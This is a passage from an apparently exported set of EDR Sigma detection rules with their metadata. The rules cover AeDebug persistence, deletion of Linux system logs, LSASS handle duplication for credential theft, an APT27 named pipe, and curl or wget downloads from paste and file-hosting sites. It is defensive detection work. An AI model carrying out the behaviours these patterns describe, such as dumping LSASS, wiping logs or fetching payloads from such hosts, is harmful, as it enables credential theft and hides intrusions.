"https://docs.microsoft.com/en-us/windows/win32/debug/configuring-automatic-debugging",
"https://attack.mitre.org/techniques/T1546/"
],
"name": "t1546_persistence_aedebug.yml",
"content": "title: Possible AeDebug Persistence Added\nid: 24914a2f-f501-410c-8f63-d70ae6a01f4d\ndescription: |\n Detects the creation or modification of the AeDebug registry key to enable debugger execution on application crashes.\n Attackers can set this registry value to point to a malicious payload to achieve persistence.\n It is recommended to investigate whether the debugger specified under the AeDebug registry key is legitimate and authorized.\nreferences:\n - https://persistence-info.github.io/Data/aedebug.html\n - https://docs.microsoft.com/en-us/windows/win32/debug/configuring-automatic-debugging\n - https://attack.mitre.org/techniques/T1546/\ndate: 2022/07/20\nmodified: 2025/02/13\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.t1546\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.Persistence\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: SetValue\n TargetObject: 'HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\AeDebug\\Debugger'\n\n filter_empty:\n Details:\n - '(Empty)'\n - ''\n - '\"\"'\n\n exclusion_debuggers:\n Details|contains:\n - 'windbg.exe'\n - 'vsjitdebugger.exe'\n\n exclusion_piksels_digital_signage_debug:\n ProcessImage: '?:\\Program Files\\Digital signage ??\\kspAdminService.exe'\n Details|contains: '?:\\Program Files\\Digital signage 11\\ntsd.exe'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: medium\nconfidence: moderate",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "24914a2f-f501-410c-8f63-d70ae6a01f4d",
"rule_name": "Possible AeDebug Persistence Added",
"rule_description": "Detects the creation or modification of the Debugger value under the AeDebug registry key, which enables debugger execution on application crashes.\nAttackers can set this registry value to point to a malicious payload to achieve persistence.\nIt is recommended to investigate whether the debugger specified under the AeDebug registry key is legitimate and authorized.\n",
"rule_creation_date": "2022-07-20",
"rule_modified_date": "2025-02-13",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1546"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "249d762f-c5a2-406d-acf3-071a10d93210",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "weak",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:35.297021Z",
"creation_date": "2026-03-23T11:45:35.297023Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:35.297028Z",
"rule_level": "medium",
"rule_confidence": "weak",
"rule_confidence_override": null,
"references": [
"https://atomicredteam.io/defense-evasion/T1070.002/",
"https://attack.mitre.org/techniques/T1070/002/"
],
"name": "t1070_002_system_logs_removed_cli_linux.yml",
"content": "title: System Logs Removed via Command-line\nid: 249d762f-c5a2-406d-acf3-071a10d93210\ndescription: |\n Detects an attempt to remove any of the system's logs.\n Attackers can try to remove the system's logs to hide their tracks.\n It is recommended to investigate responsible for this action and to look for other malicious actions stemming from it.\nreferences:\n - https://atomicredteam.io/defense-evasion/T1070.002/\n - https://attack.mitre.org/techniques/T1070/002/\ndate: 2023/01/03\nmodified: 2026/03/10\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1070.002\n - classification.Linux.Source.ProcessCreation\n - classification.Linux.Behavior.Deletion\n - classification.Linux.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: linux\ndetection:\n selection_bin:\n Image|endswith:\n - '/rm'\n - '/unlink'\n - '/shred'\n - '/truncate'\n ParentImage|contains: '?'\n\n selection_files:\n CommandLine|contains:\n - 'auth.log'\n - 'boot.log'\n - 'history.log'\n - 'cron.log'\n - 'dmesg'\n - 'dpkg.log'\n - 'kern.log'\n - 'messages'\n - 'secure'\n - 'syslog'\n - 'utmp'\n - 'wtmp'\n - 'journal'\n\n selection_command:\n CommandLine|contains:\n - '/var/log'\n - '/var/logs'\n - '/var/audit'\n - '/run/log/journal'\n\n selection_directory:\n CurrentDirectory|contains:\n - '/var/log/'\n - '/var/logs/'\n - '/var/audit/'\n - '/run/log/journal/'\n\n filter_slash:\n CommandLine|contains: ' /'\n\n exclusion_cron:\n - ParentImage:\n - '/usr/sbin/cron'\n - '/usr/sbin/crond'\n - Ancestors|contains:\n - '|/usr/sbin/cron|'\n - '|/usr/sbin/crond|'\n\n exclusion_docker:\n - GrandparentCommandLine|startswith:\n - '/bin/sh /usr/bin/docker-containerd-shim '\n - '/usr/bin/docker-containerd-shim-current '\n - '/usr/libexec/docker/docker-runc-current '\n - Ancestors|contains:\n - '|/usr/bin/dockerd|'\n - '|/usr/bin/containerd-shim-runc-v2|'\n\n exclusion_debian_installer:\n - ParentImage: '/usr/bin/dpkg'\n - ProcessAncestors|contains: 
'|/usr/bin/dpkg|'\n\n exclusion_savelog:\n CommandLine: 'rm -f -- /var/log//dmesg.? /var/log//dmesg.?.gz'\n ParentCommandLine|contains|all:\n - 'savelog'\n - '/var/log/dmesg'\n GrandparentImage|endswith: '/systemd'\n\n exclusion_genesys:\n CommandLine|contains: 'rm -f *.log.gz'\n ParentCommandLine|contains: '/opt/genesys/logcompress.sh'\n\n exclusion_apt:\n Image:\n - '/usr/bin/apt-get'\n - '/usr/bin/apt'\n\n exclusion_pmlogger:\n - ParentCommandLine|contains:\n - '/bin/sh /usr/libexec/pcp/bin/pmlogger_daily'\n - '/bin/sh /usr/libexec/pcp/bin/pmlogger_check'\n - '/bin/sh /usr/lib/pcp/bin/pmlogger_daily'\n - '/bin/sh /usr/lib/pcp/bin/pmlogger_check'\n - GrandparentCommandLine|contains:\n - '/bin/sh /usr/libexec/pcp/bin/pmlogger_daily'\n - '/bin/sh /usr/libexec/pcp/bin/pmlogger_check'\n - '/bin/sh /usr/lib/pcp/bin/pmlogger_daily'\n - '/bin/sh /usr/lib/pcp/bin/pmlogger_check'\n\n exclusion_insights:\n CommandLine|contains: '/usr/bin/python /usr/bin/insights-client'\n\n exclusion_yum:\n GrandparentCommandLine|startswith: '/usr/libexec/platform-python /bin/yum'\n\n exclusion_intertel:\n - ParentCommandLine|contains: '/opt/intertel/bin/findcore'\n - GrandparentCommandLine|contains: '/opt/intertel/bin/findcore'\n\n exclusion_mbgui:\n GrandparentCommandLine: 'runsv mbgui'\n\n exclusion_nagios_group:\n ProcessGroup: 'nagios'\n ProcessAncestors|contains:\n - '/crond|'\n - '/naemon|'\n\n exclusion_nagios:\n - ParentCommandLine|contains:\n - 'check_scan_spal.sh'\n - 'check_snmp_svc'\n - 'check_snmp_load'\n - GrandparentCommandLine|contains:\n - 'check_scan_spal.sh'\n - 'check_snmp_svc'\n - 'check_snmp_load'\n - ParentCommandLine|startswith:\n - '/bin/sh /srv/tomcat/scripts/'\n - '/bin/bash /srv/tomcat/scripts/'\n - GrandparentCommandLine|startswith:\n - '/bin/sh /srv/tomcat/scripts/'\n - '/bin/bash /srv/tomcat/scripts/'\n\n exclusion_popularity_contest:\n - ParentCommandLine: '/bin/sh /etc/cron.daily/popularity-contest'\n - GrandparentCommandLine: '/bin/sh 
/etc/cron.daily/popularity-contest'\n\n exclusion_moodle_sortlogs:\n ParentCommandLine: 'bash /usr/local/bin/moodle_sortlogs /var/log/moodle/cron /var/log/moodle'\n\n exclusion_pmcd:\n ParentCommandLine:\n - '/bin/sh /usr/libexec/pcp/lib/pmcd start-systemd'\n - '/bin/sh /usr/share/pcp/lib/pmcd start'\n\n exclusion_qradar:\n ParentCommandLine|contains:\n - '--login /opt/qradar/perf/systemStabMon -interval ??'\n - '/opt/qradar/bin/check_date_change.sh'\n\n exclusion_logrote:\n - ProcessParentImage: '/usr/sbin/logrotate'\n - ProcessAncestors|contains: '|/usr/sbin/logrotate|'\n\n exclusion_eset:\n ProcessAncestors|contains: '|/opt/eset/RemoteAdministrator/Agent/ERAAgent|'\n\n exclusion_purge:\n ProcessImage:\n - '/bin/rm'\n - '/usr/bin/rm'\n ProcessParentImage:\n - '/bin/find'\n - '/usr/bin/find'\n ProcessParentCommandLine|contains|all:\n - ' -mtime '\n - ' -exec '\n\n condition: selection_bin and selection_files and (selection_command or (selection_directory and not filter_slash)) and not 1 of exclusion_*\nlevel: medium\nconfidence: weak\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "249d762f-c5a2-406d-acf3-071a10d93210",
"rule_name": "System Logs Removed via Command-line",
"rule_description": "Detects an attempt to remove any of the system's logs.\nAttackers can try to remove the system's logs to hide their tracks.\nIt is recommended to investigate the process responsible for this action and to look for other malicious actions stemming from it.\n",
"rule_creation_date": "2023-01-03",
"rule_modified_date": "2026-03-10",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1070.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "24c0c873-a33d-4075-bcfe-ed95f209f435",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "critical",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.085199Z",
"creation_date": "2026-03-23T11:45:34.085201Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.085206Z",
"rule_level": "critical",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://rastamouse.me/dumping-lsass-with-duplicated-handles/",
"https://github.com/fortra/nanodump?tab=readme-ov-file#handle-duplication"
],
"name": "t1003_001_lsass_handle_duplicated.yml",
"content": "title: Lsass Handle with VM Read Granted Access Duplicated\nid: 24c0c873-a33d-4075-bcfe-ed95f209f435\ndescription: |\n Detects LSASS handle duplication with PROCESS_VM_READ access rights targeting credential extraction.\n The Local Security Authority Subsystem Service (LSASS) is a critical Windows process that handles authentication. Threat actors frequently target LSASS to extract credentials stored in memory.\n Handle duplication is a technique where attackers duplicate an existing handle to LSASS rather than directly opening a new handle, which can be more evasive against security solutions. Tools like Nanodump leverage this approach to dump LSASS memory while avoiding detection by antivirus and endpoint detection and response (EDR) systems.\n It is recommended to investigate the parent process and command line arguments of the process performing the handle duplication, check for additional suspicious activities in the process tree, and validate whether the process has legitimate reasons to access LSASS memory.\nreferences:\n - https://rastamouse.me/dumping-lsass-with-duplicated-handles/\n - https://github.com/fortra/nanodump?tab=readme-ov-file#handle-duplication\ndate: 2025/04/29\nmodified: 2026/02/23\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1003.001\n - classification.Windows.Source.ProcessDuplicateHandle\n - classification.Windows.Behavior.CredentialAccess\n - classification.Windows.Behavior.LSASSAccess\nlogsource:\n product: windows\n category: process_duplicate_handle\ndetection:\n selection:\n TargetImage|endswith: '\\lsass.exe'\n GrantedAccessStr|contains: 'PROCESS_VM_READ'\n AgentVersion|gte|version: 4.9.0\n\n exclusion_csrss:\n CallerImage:\n - '?:\\Windows\\System32\\csrss.exe'\n - '\\Device\\HarddiskVolume*\\Windows\\System32\\csrss.exe'\n - '\\Device\\VhdHardDisk*\\Windows\\System32\\csrss.exe'\n CallerIsDestination: true\n ProcessSignature:\n - 'Microsoft Windows'\n - 'Microsoft Windows Publisher'\n 
ProcessSigned: 'true'\n\n exclusion_hp:\n CallerImage: '?:\\Program Files\\HP\\Sure Click\\bin\\Br-init-o.exe'\n ProcessSignature|contains: 'Bromium'\n ProcessSigned: 'true'\n\n exclusion_kaspersky:\n CallerImage|startswith: '?:\\Program Files (x86)\\Kaspersky Lab\\'\n ProcessSignature|contains: 'Kaspersky Lab'\n ProcessSigned: 'true'\n\n exclusion_nable:\n CallerImage|startswith: '?:\\Program Files (x86)\\N-able Technologies\\'\n ProcessSignature:\n - 'N-ABLE TECHNOLOGIES LTD'\n - 'Solarwinds Worldwide, LLC'\n ProcessSigned: 'true'\n\n exclusion_werfault:\n CallerImage|startswith:\n - '?:\\Windows\\SysWOW64\\WerFault.exe'\n - '?:\\Windows\\System32\\WerFault.exe'\n - '?:\\Windows\\System32\\WerFaultSecure.exe'\n - '?:\\Windows\\SysWOW64\\WerFaultSecure.exe'\n ProcessSignature:\n - 'Microsoft Windows'\n - 'Microsoft Windows Publisher'\n ProcessSigned: 'true'\n\n exclusion_werfault_commandline:\n ProcessCommandLine: '?:\\windows\\System32\\svchost.exe -k WerSvcGroup'\n ProcessSignature:\n - 'Microsoft Windows'\n - 'Microsoft Windows Publisher'\n ProcessSigned: 'true'\n\n exclusion_windows_task_tools:\n CallerImage:\n - '?:\\Windows\\System32\\tasklist.exe'\n - '?:\\Windows\\System32\\taskkill.exe'\n - '?:\\Windows\\System32\\Taskmgr.exe.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Microsoft Windows'\n\n exclusion_sentinelone:\n CallerImage|startswith: '?:\\Program Files\\SentinelOne\\'\n ProcessSignature: 'Sentinelone, Inc.'\n ProcessSigned: 'true'\n\n exclusion_perfmon:\n CallerImage: '?:\\Windows\\System32\\perfmon.exe'\n ProcessSignature: 'Microsoft Windows'\n ProcessSigned: 'true'\n\n exclusion_windows_cluster_binaries:\n ProcessOriginalFileName:\n - 'rhs.exe'\n - 'clussvc.exe'\n ProcessSignature: 'Microsoft Windows'\n ProcessSigned: 'true'\n\n exclusion_checkpoint:\n CallerImage|startswith: '?:\\Program Files (x86)\\CheckPoint\\'\n ProcessSignature: 'Check Point Software Technologies Ltd.'\n ProcessSigned: 'true'\n\n exclusion_dnspy:\n ProcessSha256:\n - 
'6674538f0c1bfb2b02921aebea81654dd196efbfe520c1c34d4872908a205a9d'\n - 'bc1c4e0fc49c138bbfc223d3e94231cd4884439c663646d91e48fa005df6704a'\n\n exclusion_pythonservice:\n ProcessSha256: '29a187322c91af564eb259b6b2834d0530d9c7bf0f7c7e42a1c911679cdb745e'\n\n # Covered by another specific rule\n exclusion_procdump:\n ProcessOriginalFileName:\n - 'procdump.exe'\n - 'procdump'\n ProcessSignature: 'Microsoft Corporation'\n ProcessSigned: 'true'\n\n # Covered by another specific rule\n exclusion_rdrleakdiag:\n CallerImage: '?:\\Windows\\System32\\rdrleakdiag.exe'\n ProcessSignature:\n - 'Microsoft Corporation'\n - 'Microsoft Windows'\n - 'Microsoft Windows Publisher'\n ProcessSigned: 'true'\n\n # This is handled by the rule 78397a73-7ba5-4e02-8847-6a3242d29f28\n exclusion_taskmgr:\n CallerImage: '?:\\Windows\\System32\\Taskmgr.exe'\n ProcessSignature: 'Microsoft Windows'\n ProcessSigned: 'true'\n\n exclusion_sccm:\n CallerImage: '?:\\Windows\\CCM\\CcmExec.exe'\n ProcessSignature: 'Microsoft Corporation'\n ProcessSigned: 'true'\n\n exclusion_adobe:\n ProcessOriginalFileName: 'Creative Cloud.exe'\n ProcessSignature: 'Adobe Inc.'\n ProcessSigned: 'true'\n\n exclusion_elastic:\n CallerImage: '?:\\Program Files\\Elastic\\Endpoint\\elastic-endpoint.exe'\n ProcessSignature: 'Elasticsearch, Inc.'\n ProcessSigned: 'true'\n\n exclusion_internet_explorer:\n CallerImage: '?:\\Program Files\\Internet Explorer\\iexplore.exe'\n ProcessSignature: 'Microsoft Corporation'\n ProcessSigned: 'true'\n\n exclusion_alibaba:\n CallerImage|startswith: '?:\\Program Files (x86)\\AlibabaProtect\\'\n ProcessSignature: 'ALIBABA (CHINA) NETWORK TECHNOLOGY CO.,LTD.'\n ProcessSigned: 'true'\n\n exclusion_mcafee:\n CallerImage|startswith: '?:\\Program Files\\McAfee\\'\n ProcessSignature|contains: 'McAfee, Inc.'\n ProcessSigned: 'true'\n\n exclusion_fsecure:\n CallerImage|startswith: '?:\\Program Files (x86)\\F-Secure\\'\n ProcessSignature|contains: 'WithSecure Oyj'\n ProcessSigned: 'true'\n\n 
exclusion_lsass:\n CallerImage|startswith: '?:\\Windows\\system32\\lsass.exe'\n ProcessSigned: 'true'\n\n exclusion_wsmprovhost_to_itself:\n CallerImage: '?:\\Windows\\System32\\wsmprovhost.exe'\n SourceImage: '?:\\Windows\\System32\\wsmprovhost.exe'\n\n exclusion_powershell_to_itself:\n - CallerImage: '?:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe'\n SourceImage: '?:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe'\n - CallerImage: '?:\\Program Files\\PowerShell\\7\\pwsh.exe'\n SourceImage: '?:\\Program Files\\PowerShell\\7\\pwsh.exe'\n\n exclusion_powertoys:\n ProcessOriginalFileName: 'PowerToys.FileLocksmithUI.dll'\n ProcessSignature: 'Microsoft Corporation'\n ProcessSigned: 'true'\n\n exclusion_fileassassin:\n ProcessOriginalFileName: 'FileASSASSIN.exe'\n ProcessCompany: 'Malwarebytes'\n\n exclusion_setup:\n ProcessOriginalFileName: 'SetupHost.exe'\n ProcessSignature: 'Microsoft Windows'\n ProcessSigned: 'true'\n\n exclusion_symantec:\n CallerImage: '?:\\Program Files (x86)\\Common Files\\Symantec Shared\\COH\\COH64.exe'\n ProcessSignature: 'Symantec Corporation'\n ProcessSigned: 'true'\n\n exclusion_jetbrains:\n ProcessOriginalFileName: 'JetBrains.ReSharperUltimate.LightInstaller'\n ProcessSignature: 'JetBrains s.r.o.'\n ProcessSigned: 'true'\n\n exclusion_system_informer:\n ProcessOriginalFileName: 'System Informer.exe'\n ProcessSignature: 'Winsider Seminars & Solutions Inc.'\n ProcessSigned: 'true'\n\n\n condition: selection and not 1 of exclusion_*\nlevel: critical\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "24c0c873-a33d-4075-bcfe-ed95f209f435",
"rule_name": "Lsass Handle with VM Read Granted Access Duplicated",
"rule_description": "Detects the duplication of an LSASS process handle with PROCESS_VM_READ access rights, a pattern associated with credential extraction.\nThe Local Security Authority Subsystem Service (LSASS) is a critical Windows process that handles authentication. Threat actors frequently target LSASS to extract credentials stored in memory.\nHandle duplication is a technique in which attackers duplicate an existing handle to LSASS rather than opening a new one directly, which can be more evasive against security solutions. Tools like Nanodump leverage this approach to dump LSASS memory while avoiding detection by antivirus and endpoint detection and response (EDR) systems.\nIt is recommended to investigate the parent process and command line arguments of the process performing the handle duplication, check for additional suspicious activities in the process tree, and validate whether the process has a legitimate reason to access LSASS memory.\n",
"rule_creation_date": "2025-04-29",
"rule_modified_date": "2026-02-23",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access"
],
"rule_technique_tags": [
"attack.t1003.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "24ca43a5-7027-4676-8c7f-991dff78cc7c",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.607956Z",
"creation_date": "2026-03-23T11:45:34.607971Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.607979Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.intrinsec.com/apt27-analysis/",
"https://www.trendmicro.com/en_us/research/21/d/iron-tiger-apt-updates-toolkit-with-evolved-sysupdate-malware-va.html",
"https://attack.mitre.org/techniques/T1106/"
],
"name": "t1106_apt27_named_pipe_creation.yml",
"content": "title: Suspicious APT27 Related Named Pipe Created\nid: 24ca43a5-7027-4676-8c7f-991dff78cc7c\ndescription: |\n Detects the creation of, or connection to, a named pipe called \"testPipe\".\n This name is associated with the APT27 threat actor, more specifically with its HyperBro malware.\n It is recommended to verify that the pipe was legitimately created by a developer.\nreferences:\n - https://www.intrinsec.com/apt27-analysis/\n - https://www.trendmicro.com/en_us/research/21/d/iron-tiger-apt-updates-toolkit-with-evolved-sysupdate-malware-va.html\n - https://attack.mitre.org/techniques/T1106/\ndate: 2022/10/26\nmodified: 2025/04/14\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1106\n - attack.t1559\n - classification.Windows.Source.NamedPipe\n - classification.Windows.ThreatActor.APT27\n - classification.Windows.Malware.HyperBro\n - classification.Windows.Behavior.CommandAndControl\nlogsource:\n product: windows\n category: named_pipe_creation\ndetection:\n selection:\n PipeName: '\\testPipe'\n\n exclusion_hellodoc:\n ProcessImage|endswith:\n - '\\IMAGINE Editions\\HelloDoc\\HelloDoc.exe'\n - '\\imagine editions\\hellodoc\\HelloDoc Acces Vidal.exe'\n ProcessSigned: 'true'\n\n condition: selection and not 1 of exclusion_*\nfalsepositives:\n - Legitimate developer creation of a named pipe called \"testPipe\"\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "24ca43a5-7027-4676-8c7f-991dff78cc7c",
"rule_name": "Suspicious APT27 Related Named Pipe Created",
"rule_description": "Detects the creation of, or connection to, a named pipe called \"testPipe\".\nThis name is associated with the APT27 threat actor, more specifically with its HyperBro malware.\nIt is recommended to verify that the pipe was legitimately created by a developer.\n",
"rule_creation_date": "2022-10-26",
"rule_modified_date": "2025-04-14",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution"
],
"rule_technique_tags": [
"attack.t1106",
"attack.t1559"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "250b3fce-b831-41da-8d48-7ece2c3de1e0",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "moderate",
"alert_count": 1,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.599825Z",
"creation_date": "2026-03-23T11:45:34.599829Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.599836Z",
"rule_level": "high",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1105/",
"https://attack.mitre.org/techniques/T1071/001/"
],
"name": "t1105_curl_suspicious_link_linux.yml",
"content": "title: File Downloaded via curl or wget from Suspicious URL (Linux)\nid: 250b3fce-b831-41da-8d48-7ece2c3de1e0\ndescription: |\n Detects the usage of curl or wget to download a file from public hosting services that may contain a malicious payload.\n This technique is used by attackers to download payloads that are hosted on public websites.\n It is recommended to perform an analysis of the downloaded file to check if the content is malicious.\nreferences:\n - https://attack.mitre.org/techniques/T1105/\n - https://attack.mitre.org/techniques/T1071/001/\ndate: 2023/01/27\nmodified: 2025/10/28\nauthor: HarfangLab\ntags:\n - attack.command_and_control\n - attack.t1105\n - attack.t1071.001\n - classification.Linux.Source.ProcessCreation\n - classification.Linux.LOLBin.Curl\n - classification.Linux.Behavior.FileDownload\n - classification.Linux.Behavior.NetworkActivity\nlogsource:\n category: process_creation\n product: linux\ndetection:\n selection:\n Image|endswith:\n - '/wget'\n - '/wget2' # https://discussion.fedoraproject.org/t/f40-change-proposal-wget2-as-wget/96422\n - '/curl'\n CommandLine|contains:\n - 'cdn.discordapp.com'\n - 'api.telegram.org'\n - 'www.dropbox.com'\n - 'api.dropboxapi.com'\n - 'content.dropboxapi.com'\n - 'transfer.sh'\n - 'anonfiles.com'\n - 'gofile.io'\n - 'file.io'\n - 'raw.githubusercontent.com'\n - 'gist.githubusercontent.com'\n - 'pastebin.com'\n - 'mediafire.com'\n - 'mega.nz'\n - 'ddns.net'\n - '.paste.ee'\n - '.hastebin.com'\n - '.ghostbin.co/'\n - 'ufile.io'\n - 'storage.googleapis.com'\n - 'send.exploit.in'\n - 'privatlab.net'\n - 'privatlab.com'\n - 'sendspace.com'\n - 'pastetext.net'\n - 'pastebin.pl'\n - 'paste.ee'\n - 'pastie.org'\n - 'artchive.org'\n - 'paste.c-net.org'\n\n # https://github.com/gianlucaborello/libprocesshider/archive/refs/heads/master.zip\n # https://github.com/gianlucaborello/libprocesshider/archive/25e0587d6bf2137f8792dc83242b6b0e5a72b415.zip\n - 'https://github.com/*/archive/*.zip'\n\n 
exclusion_legitimate_url:\n CommandLine|contains:\n - ' https://raw.githubusercontent.com/Orange-Cyberdefense/*IOC'\n - ' https://raw.githubusercontent.com/google/'\n - ' https://raw.githubusercontent.com/Homebrew/'\n - ' https://raw.githubusercontent.com/wp-cli/'\n - ' https://raw.githubusercontent.com/nextcloud/'\n - ' https://raw.githubusercontent.com/laurent22/joplin/'\n - ' https://raw.githubusercontent.com/ohmyzsh/'\n - ' https://raw.githubusercontent.com/nvm-sh/'\n - ' https://raw.githubusercontent.com/docker-library/'\n - ' https://raw.githubusercontent.com/anchore/'\n - ' https://storage.googleapis.com/git-repo-downloads/'\n - ' https://github.com/scylladb/'\n - ' https://raw.githubusercontent.com/microsoft/'\n - ' https://raw.githubusercontent.com/community-scripts/ProxmoxVE/'\n - ' https://raw.githubusercontent.com/helm/'\n - ' https://raw.githubusercontent.com/pyenv/'\n - ' https://raw.githubusercontent.com/onyx-dot-app/'\n\n exclusion_commandline:\n CommandLine|contains: 'curl -vvv --max-time 0 --proxy * --proxy-user * -H Authorization: Bearer '\n\n exclusion_ancestors:\n Ancestors|contains:\n - '|/usr/sbin/cron|'\n - '|/usr/sbin/crond|'\n - '|/usr/bin/dockerd|'\n - '|/usr/bin/containerd-shim-runc-v2|'\n\n exclusion_netdata:\n - CommandLine|contains:\n - ' https://raw.githubusercontent.com/netdata/netdata/master/packaging/installer/'\n - ' https://storage.googleapis.com/netdata-nightlies/'\n - ParentCommandLine: 'bash /etc/cron.daily/netdata-updater'\n\n exclusion_clamav:\n ParentCommandLine: '/usr/bin/bash /usr/local/sbin/clamav-unofficial-sigs.sh'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "250b3fce-b831-41da-8d48-7ece2c3de1e0",
"rule_name": "File Downloaded via curl or wget from Suspicious URL (Linux)",
"rule_description": "Detects the use of curl or wget to download, from public hosting services, a file that may contain a malicious payload.\nThis technique is used by attackers to retrieve payloads hosted on public websites.\nIt is recommended to analyze the downloaded file to determine whether its content is malicious.\n",
"rule_creation_date": "2023-01-27",
"rule_modified_date": "2025-10-28",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.command_and_control"
],
"rule_technique_tags": [
"attack.t1071.001",
"attack.t1105"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "252c798b-019c-4d67-848f-3b675cd5c18f",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.613378Z",
"creation_date": "2026-03-23T11:45:34.613381Z",
"enabled": true,
